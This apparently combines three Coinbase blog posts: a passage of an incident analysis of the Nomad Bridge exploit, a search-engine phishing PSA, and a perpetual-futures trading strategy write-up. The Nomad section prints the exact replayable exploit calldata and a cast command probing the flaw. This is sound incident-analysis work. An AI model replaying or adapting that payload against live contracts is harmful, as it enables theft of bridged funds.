$ cast call 0x5d94309e5a0090b165fa4181519701637b6daeba "messages(bytes32)" "bc0f99a3ac1593c73dbbfe9e8dd29c749d8e1791cbe7f3e13d9ffd3ddea57284" --rpc-url $MAINNET_RPC_URL --block 15249928
0x0000000000000000000000000000000000000000000000000000000000000000

The transaction succeeded even without providing the necessary proof, triggering the vulnerability in the acceptableRoot() method by supplying it with a 0x0 root hash value, as illustrated in the debugger below:

Source: Tenderly Debugger

Messages not present in the messages[] storage can be validated using the proveAndProcess() method; however, since the address called process() directly, it triggered the vulnerability.

Interestingly enough, it seems that bitliq[.]eth was also likely testing the ERC-20 bridge contract an hour prior to the exploit and bridged 0.01 WBTC over to Moonbeam. [Tx]

Initial Exploitation

Active exploitation started on August 1, 2022, all within the same block 15259101, and resulted in a combined theft of 400 WBTC.

All four transactions used identical exploit payloads with the exception of a recipient address as described in the Vulnerability section above:

0x6265616d000000000000000000000000d3dfd3ede74e0dcebc1aa685e151332857efce2d000013d60065746800000000000000000000000088a69b4e698a4b090df6cf5bd7b2d47325ad30a3006574680000000000000000000000002260fac5e5542a773aa44fbcfedf7c193bc2c59903000000000000000000000000f57113d8f6ff35747737f026fe0b37d4d7f4277700000000000000000000000000000000000000000000000000000002540be400e6e85ded018819209cfb948d074cb65de145734b5b0852e4a5db25cac2b8c39a

Some observations on the above:

  • The first three addresses were funded by Tornado Cash and have been actively transacting with each other which indicates a single actor group.
  • Unlike the first two exploit transactions, 0xb5c5…590e and bitliq[.]eth sent the exploit payload directly to the contract without the use of Flashbots to hide it from the public mempool.
  • bitliq[.]eth replayed an earlier exploit transaction in the same block 15259101 as 0xb5c5…590e, indicating either prior knowledge of the exploit or learning about 0xb1fe…ae28 from the mempool.
  • All four transactions used identical payloads, each stealing 100 WBTC at a time.

Copycats

In total, 88% of addresses conducting the exploits were identified as copycats and together they stole about $88M in tokens from the bridge.

The majority of copycats used a variation of the original exploit, simply modifying targeted tokens, amounts, and recipient addresses. We can classify unique payloads by grouping them based on the contracts they call and the unique 4-byte method identifiers invoked, as illustrated below:

Based on our analysis, more than 88% of unique addresses called the vulnerable contract directly using the 928bc4b2 function identifier, which corresponds to the process(bytes) method used in the original exploit. The remainder performed the same call through intermediary contracts, for example via 1cff79cd, the execute(address,bytes) method, batching multiple process() transactions together, among other minor variations.
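
These 4-byte identifiers are simply the first four bytes of the keccak-256 hash of the canonical function signature. A quick Python sketch (using the pycryptodome package) reproduces both selectors mentioned above:

from Crypto.Hash import keccak  # pip install pycryptodome

def selector(signature):
    """First 4 bytes of keccak-256 over the canonical function signature."""
    digest = keccak.new(digest_bits=256, data=signature.encode())
    return digest.hexdigest()[:8]

print(selector("process(bytes)"))          # 928bc4b2
print(selector("execute(address,bytes)"))  # 1cff79cd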

Following the initial compromise, the original exploiters had to compete against hundreds of copycats:

While the majority of valuable tokens were claimed by just two of the original exploiters' addresses, hundreds of others were able to claim part of the bridge's holdings:

Below is a chart showing the tokens stolen over time in USD. It becomes apparent that the exploiters were going token by token as they were draining the bridge.

The Great Return

To date, 12% of the funds stolen from the Nomad Bridge contract has been returned, including partial returns. The majority of the returns took place in the hours following Nomad Bridge's request to send funds to the recovery address on August 3, 2022. [TweetTx]

Below is a breakdown of the funds returned, which includes ETH and various other tokens, some of which were never even on the bridge:

Funds continue to be sent back to the bridge's recovery address, albeit more slowly in recent days than when the address was initially posted:

The majority of returned funds appear to be in USDC, followed by DAI, CQT, WETH, and WBTC. This is notably different from the breakdown of the tokens exploited because the original exploiters primarily drained the bridge of WBTC and WETH and, unlike later-stage exploiters, moved those funds onward with no intent to return them.

Interestingly, one of the original exploiters, bitliq[.]eth, has returned only 100 ETH to the bridge contract, but has begun cashing out the rest of their proceeds through renBTC and burning it in exchange for BTC.

Categorizing the “exploiters”

When assessing the Nomad Bridge exploiters, we categorized the attackers into the following buckets:

  • Black hats: Those that don’t return funds and continue moving them onwards.
  • White hats: Those that fully send funds back to the recovery addresses. (Please note that while we are using the term white hat for explanatory purposes here, the initial taking of the funds was not authorized and is not an activity we would endorse.)
  • Grey hats: Those that partially send funds back to the recovery addresses.
  • Unknown unknowns: Those that have yet to move funds.

Approximately 24% of funds continue to sit untouched. We suspect these are either attackers waiting out the heat or shrewd degens holding out for a bounty from Nomad. The largest volume of funds, however, has moved onwards: as of August 5, we estimate ~64%.

To stay up to date with the latest in terms of the funds returned, check out this dashboard.

Delving Into the Blackhats

Of those funds that have moved onwards, we have identified several large rings of addresses that all commingle funds. In particular, one cluster of addresses seems to have amassed over $62M in volume. Interestingly, one address within this cluster was the first address to have conducted the exploit [tx hash].

To date, we primarily see these rings following one of the below patterns:

  • MEV bot activity
  • Commingle and hold on to wait out the heat
  • Swapping funds and eventually returning a partial amount of funds to the recovery address
  • Swapping funds and investing in DeFi projects or cashing out at various CEXs
  • Moving funds through Tornado Cash

Below is an example of how some addresses have begun moving funds through Tornado Cash, which as of August 8, 2022, is a sanctioned entity.

Beware of Scams:

Several white hats have already returned over 10% of funds to the bridge contract. However, this wasn’t without hiccups.

Originally, the Nomad team posted, both on Twitter and on the blockchain, the Ethereum address to which any exploited funds should be sent.

However, scammers cleverly followed suit and set up fraudulent ENS domains to pose as the Nomad team, requesting that funds be sent to vanity addresses with the same initial characters as the legitimate recovery address.

For example, below is a message sent by one of the scammers. Note the fraudulent recovery address, the ENS domain, and the 10% bounty offer. Nomad has since offered to let white hats keep 10% of exploited proceeds. [Tx]

Protecting Yourself

While most contracts are audited extensively by various blockchain auditors, contracts may still contain yet-to-be-discovered vulnerabilities. If you want to provide liquidity to a particular protocol or bridge funds over, here are some tips to keep in mind:

  • When supplying liquidity, don’t keep all of your funds on one protocol or stored in the bridge.
  • Make sure to regularly review and revoke any contract approvals you don’t actively need.
  • Stay up to date with security intelligence feeds to track protocols you’ve invested in.

Coinbase is committed to improving our security and the wider industry's security, as well as protecting our users. We believe that exploits like these can be mitigated and ultimately prevented. Besides making codebases open source for the public to review, we recommend frequent protocol audits, bug bounty programs, and active collaboration with security researchers. Although this exploit was a difficult learning experience, we believe that understanding how the exploit occurred can only help further mature our young industry.

Indicators

Initial exploiters:

Ethereum: 0x56d8b635a7c88fd1104d23d632af40c1c3aac4e3
Ethereum: 0xf57113d8f6ff35747737f026fe0b37d4d7f42777
Ethereum: 0xb88189cd5168c4676bd93e9768497155956f8445
Ethereum: 0x847e74d8cd0d4bc2716a6382736ae2870db94148
Ethereum: 0x000000000000660def84e69995117c0176ba446e
Ethereum: 0xb5c55f76f90cc528b2609109ca14d8d84593590e
Ethereum: 0xa8c83b1b30291a3a1a118058b5445cc83041cd9d

See Dune Dashboard for a complete listing of exploiter addresses, transactions, and live status of stolen assets.



Security PSA: Search engine phishing

Tl;dr: Search engine phishing exploits the trust we have in search engines and the convenience of searching for something rather than remembering the domain. The following piece outlines what search engine phishing attacks may look like and how Coinbase users can avoid them.

By Coinbase Security Team

How do you log in to Coinbase? If you’re like many people, you open your preferred browser and type “Coinbase” or “Coinbase login” in the address bar. You expect to get results like this:

But sometimes you may get results like this:

The second set of screenshots shows an example of phishing links. This is called search engine phishing, and it has become a trend for attackers targeting Coinbase accounts.

When most people think of phishing, email or SMS phishing comes to mind. However, phishing can take many forms. Search engine phishing exploits the trust we have in search engines and the convenience of searching for something rather than remembering the domain.

We all do it, but this opens us up to potential search engine phishing attacks if we are not diligent about checking our links and protecting ourselves online. Here are some tips to prevent this from happening to you:

Double-check our naming conventions

Coinbase uses a uniform naming convention for our websites and pages. The convention follows this pattern: [page].coinbase.com. For example, here are some of our pages:

One way to avoid this type of scam is to bookmark the above Coinbase pages that you frequent. Bookmarking removes the need to search for, or manually type, a domain name. Here is a quick tutorial on how to create bookmarks in the most popular browsers.
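
For readers who like to automate the habit, here is a small illustrative Python check (a sketch, not an official Coinbase tool) that applies the [page].coinbase.com convention. A passing check is necessary but not sufficient, so bookmarks remain the safer option:

from urllib.parse import urlparse

def follows_coinbase_convention(url):
    """True only for coinbase.com or a direct *.coinbase.com subdomain."""
    host = (urlparse(url).hostname or "").lower()
    return host == "coinbase.com" or host.endswith(".coinbase.com")

print(follows_coinbase_convention("https://pro.coinbase.com/login"))       # True
print(follows_coinbase_convention("https://sites.google.com/evil"))        # False
print(follows_coinbase_convention("https://coinbase.com.evil.net/login"))  # False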

Know common scam naming conventions

It takes a good amount of work for anyone to get their website ranked high in search engine results. This is called Search Engine Optimization (SEO), which is the process of improving the traffic from search engines to a website. Some website services, including Google Sites and Microsoft Azure, offer built-in SEO functionality.

As seen in the screenshots above, attackers tend to exploit website services like Google Sites and Microsoft Azure, building a false sense of trust in the phishing link. The naming conventions might follow a pattern like one of the following:

sites.google.com/[phishingpage].com
[phishingpage].azurewebsites.net

These phishing websites will typically then redirect to another phishing page after a victim clicks a button on the site. The redirect will take the victim to a second phishing page where the actual phishing attack happens. Using a second phishing site is a way for attackers to protect the first phishing site and maintain its SEO ranking. So, be aware of redirects as an indication that you may be visiting a phishing website. A typical flow may look like this:

Look for these red flags

Here are some indicators you can look for to protect yourself from search engine phishing:

  • Does the naming convention of the search result follow this pattern: [page].coinbase.com? If not, it is likely a phishing page.
  • When you click on a search result, are you redirected to a website with a different domain than what you expected? If so, it is likely a phishing page.
  • When you click on a search result, does the website look different than the last time you logged in to Coinbase? If so, this could be a phishing page which is using an older version of our website theme.
  • When you visit the website from the search results and click on a button, are you redirected to a website with a different domain than the first page? If so, it is likely a phishing page.
  • After you enter your credentials, are you prompted to call Coinbase because of some sort of error? Does a live chat box automatically open? This tactic is commonly paired with phishing attacks and is known as a “support scam” attack.

Here is an example of what a scam error may look like and a live chat box which may follow the error:

Remember, think before you click! Our US support phone number is 1-888-908-7930 and you can find other ways to contact us at help.coinbase.com. If you are suspicious of activity on a "Coinbase" website, go to our Help page and initiate a conversation there with our Support team.

We are constantly monitoring the internet to identify phishing domains and take them down, but we need your help. Please help us by reporting any suspicious domains to security@coinbase.com.



Quantitative Crypto Insight: A systematic crypto trading strategy using perpetual futures

Tl;dr: Perpetual futures are financial instruments that have become increasingly popular in the crypto space. Coinbase demonstrates a hypothetical, simple delta neutral strategy which takes advantage of positively skewed funding rates in the perpetual futures market to achieve a high return on investment.

By The Coinbase Data Science Quantitative Research Team

Systematic Trading Strategy

A systematic trading strategy is a mechanical way of trading that is aimed at exploiting certain aspects of market inefficiencies to achieve investment goals. These strategies employ disciplined, rule-based trading that can be easily backtested with historical market data. Rule-based trading follows strict, predefined trading methodologies that are not impacted by market conditions.

Systematic trading is a fully grown area of investing that spans a wide range of strategies and asset classes. With the ever-growing crypto market, in which thousands of tokens are being traded and derivatives offerings are being expanded, systematic trading will play an important role in goal-based investing with efficient capital allocation and rigorous risk management. In this piece, we explore a delta neutral strategy to demonstrate the basic building blocks of systematic trading.

Spot market and derivative market terms:

Spot Trading: Buying or selling assets in a way that results in the immediate transfer of ownership. For crypto spot trading, one can directly buy or sell crypto assets via centralized exchanges, retail brokers, or decentralized exchanges. (For example: Coinbase Prime, Coinbase Exchange)

Derivatives Trading: Derivatives are financial contracts whose values depend on underlying assets. These contracts are set between two parties and can trade on a centralized/decentralized exchange or over-the-counter (OTC). A futures contract, one of the most popular derivatives, obligates parties to transact an underlying asset at a future date at a predetermined price. Derivatives, such as futures, are highly regulated financial instruments. For example, in the United States, the CFTC regulates the derivatives market, including the commodity futures, options, and swaps markets, as well as over-the-counter markets.

Delta and Delta Neutral: Delta measures the rate of change of a derivative contract's price with respect to changes in the underlying asset's price. The underlying asset itself, S, is called delta one because the rate of change of S relative to itself is 1. Futures contracts that closely track the underlying asset are approximately delta one. To achieve a delta neutral portfolio, one can take offsetting positions in the spot and derivatives markets to construct a portfolio with an overall delta of zero. A zero/neutral delta portfolio is not subject to underlying price movements.
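
In symbols, for a derivative with price V on underlying S, delta is Δ = ∂V/∂S, and a portfolio holding nᵢ units of instruments with deltas Δᵢ is delta neutral when Σᵢ nᵢΔᵢ = 0.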

Perpetual futures

Perpetual futures have become a popular way to trade crypto assets. Unlike traditional futures that have expirations and associated delivery or settlement dates, perpetual futures don’t expire. These instruments are periodically cash settled with funding rate payment and there is no actual delivery of the underlying assets. Perpetual futures have to be either closed out to exit or held indefinitely.

Perpetual futures have their value closely pegged to the underlying assets they track with a funding payment mechanism built into the contract. It allows investors to easily take directional positions without worrying about physical delivery of the underlying assets. Perpetual futures have several advantages: it’s easy to take long or short positions, contracts can have high leverage, and there is no expiration to the contract — eliminating the need to roll futures.

We will use two scenarios to illustrate how the funding payment mechanism works:

  1. When perpetual futures are traded at a premium to spot prices, the funding rate is positive. Long futures traders will pay the short counterparty a funding amount proportional to the funding rate determined by the exchange.
  2. When perpetual futures are traded at a discount to spot prices, the funding rate is negative. Short futures traders will pay the long counterparty.

For illustrative purposes only.

As illustrated above, the more the futures price diverges from the spot price, the bigger the funding payment exchanged, up to a clamp threshold set by the exchange. It's an effective way to balance supply and demand in the futures market and hence keep futures tightly anchored to the underlying assets.

Systematic trading strategy with perpetual futures

Based on the above discussions, we explore a systematic delta neutral trading strategy that monetizes the rich funding rate in the perpetual futures market. A one-step setup of initial positions is required and no further rebalance is needed. We first take a long position on the underlying asset, at the same time take a short position on the perpetual future with the same notional. Given that the price of a perpetual future closely follows its underlying asset, the net position is delta neutral and has little exposure to the price movement of underlying assets. The strategy draws its performance from the funding rate payments since it is on the short side of the perpetual market.

Below is how it can be set up with BTC and BTC-PERP on 2x leverage:

  1. Deposit USD Y amount as collateral
  2. Long BTC with notional 2xY
  3. Short BTC-PERP with notional 2xY
  4. Every 1 hour, the position either collects or pays the funding on 2xY BTC-PERP position.

Here’s an example of a one period performance:

A trader opens a long position on Bitcoin. The open price was $9,910 USD and position size was 2 BTC. The trader at the same time opens a short position on BTC-PERP at $10,000 and with position size 2*9,910/10,000 = 1.982.

If the price of Bitcoin then increases to 12,500 USD and BTC-PERP increases to 12,613, the unrealized profit from the BTC position is 2*(12,500-9,910) = 5,180, and the unrealized loss from the BTC-PERP position is -1.982*(12,613-10,000) ≈ -5,180. The profit and loss offset each other nicely. During the same period, if we assume a funding rate of 0.3%, we collect a payment of 10,000 * 1.982 * 0.3% ≈ 59.5. With periodic funding payments, the strategy accrues returns over time.
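
The arithmetic above is easy to verify; here is a short Python sketch reproducing the example (illustrative only, with values taken from the text):

spot_open, perp_open = 9_910.0, 10_000.0
btc_size = 2.0
perp_size = btc_size * spot_open / perp_open        # 1.982, equal notional

spot_close, perp_close = 12_500.0, 12_613.0
funding_rate = 0.003                                # 0.3% for the period

spot_pnl = btc_size * (spot_close - spot_open)      # +5,180.0
perp_pnl = -perp_size * (perp_close - perp_open)    # ~ -5,180
funding = perp_open * perp_size * funding_rate      # funding collected

print(f"delta PnL: {spot_pnl + perp_pnl:+.1f}")     # ~0: the two legs offset
print(f"funding collected: {funding:.2f}")          # 59.46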

In our backtest, we deposit USD $1MM as collateral and then enter BTC long positions and BTC-PERP short positions with the same notional. Given that the strategy has minimal exposure to underlying price fluctuations, we can lever up our positions by 10x, and the leverage ratio stays stable through the period with negligible auto-deleverage/liquidation risk. With a holding period of approximately 1 year, the strategy returned ~40%.

Data source: Coinbase and FTX

In order to confirm the achieved performance, backtests with different holding periods and different entry/exit dates were performed: 1 month, 3 months, and 6 months. The table below shows median metrics related to these backtests:

Data source: Coinbase and FTX

From the simulations above, the longer the holding period, the higher the annualized return.

We just demonstrated a systematic trading strategy with spot BTC and perpetual futures. It is a basic strategy that only requires the initial setup of spot and derivative positions; no further active position management is needed before closing out. To make the strategy more robust, one can devise additional trading rules for risk management under market stress scenarios. It will also be interesting to explore ideas on running more dynamic trading rules that adjust leverage ratio to enhance return.

Funding rate

The core of the strategy is funding arbitrage between the perpetual futures market and fiat currency borrowing. Below we take a closer look at the funding rate distribution in the futures market. The rate is concentrated in the bucket around 2%, which can be thought of as a breakeven rate, but there is a long, positively skewed tail which contributes to our strategy's performance.

Data source: FTX

Below we also look at the autocorrelation function (ACF) of the funding rate to understand how past observations are correlated with future occurrences. It is clear from the autocorrelogram below that the funding rate exhibits serial correlation up to about 20 days.

Data source: FTX

It is also interesting to see how the funding rate and spot prices are related. It is evident from the chart below that when spot prices move up quickly, so does the funding rate, and the reverse applies as well.

Data source: Coinbase and FTX

When spots are quickly ramping up, trend followers are chasing the market, possibly with leveraged positions in the futures market. The demand for funding in the futures market pushes up funding costs. When the market takes a downturn, there is less appetite for funding, so funding costs decrease and can even go negative.

Risk analysis

Execution risk for delta PnL offsetting. We demonstrated a delta neutral strategy in which the PnL from the spot leg and the perpetual futures leg are expected to offset each other. Oftentimes, prices between spot and futures can diverge and cause non-trivial delta PnL. This can be mitigated by entering into and exiting from the positions gradually, in relatively small sizes.

Slippage cost. The effective price paid/received when Coinbase executes orders against an exchange or DEX. When the order size is big compared to order book depth, advanced trading algorithms are necessary to mitigate slippage cost.

Funding rate risk. The funding rate is stochastic and can fluctuate above/below zero. When the rate drifts below zero, the strategy underperforms. Historical markets have shown a positively skewed funding rate distribution; however, there is no guarantee of its path in the future.

Leverage risk: auto-deleveraging/liquidation. In order to have a sizable return, the strategy has to be levered up. Given that the strategy is delta neutral, it is safe to run 10x leverage under normal market conditions. However, in a stressed market, when the spot price and perpetual futures price diverge for a prolonged period of time, the strategy bears the risk of auto-deleverage or even liquidation, which could result in significant capital losses.

Future directions

We have demonstrated how to run a systematic trading strategy in the crypto market with a basic one-step setup. Systematic trading in crypto is uncharted territory in which many existing strategies from traditional financial markets could be equally applicable. However, with innovations coming from different angles (e.g., decentralized exchanges, liquidity pools, DeFi lending/borrowing), many new opportunities and possibilities arise. We, as part of the Data Science Quantitative Research team, aim to develop and research in this space from a quantitative perspective in ways that can drive new Coinbase products.

You can track crypto spot and derivatives markets with Coinbase Prime analytics, a set of institution-focused market data features that provide real-time and historical analytics for cryptocurrency spot and derivatives markets. Elegant and user-friendly, Coinbase Prime analytics provides a comprehensive toolkit built to meet the needs of sophisticated investors and market participants.

The team would like to thank Guofan Hu and Nabil Benbada for their contributions to this research piece.

Disclaimer: This content is being provided to you for informational purposes only. This is not financial or investment advice, and the content on this page, and any information contained therein, does not constitute a recommendation by Coinbase to buy, sell, or hold any security, derivative, or similar financial product or instrument referenced in the content. The hypothetical strategy referenced herein is for demonstration purposes only and is not an endorsement or recommendation of a particular trading strategy. Real trading, including trading in the types of instruments identified in this document, carries risks, including but not limited to operational and strategy risk, and can incur significant losses. Public FTX market data is used for the backtest.

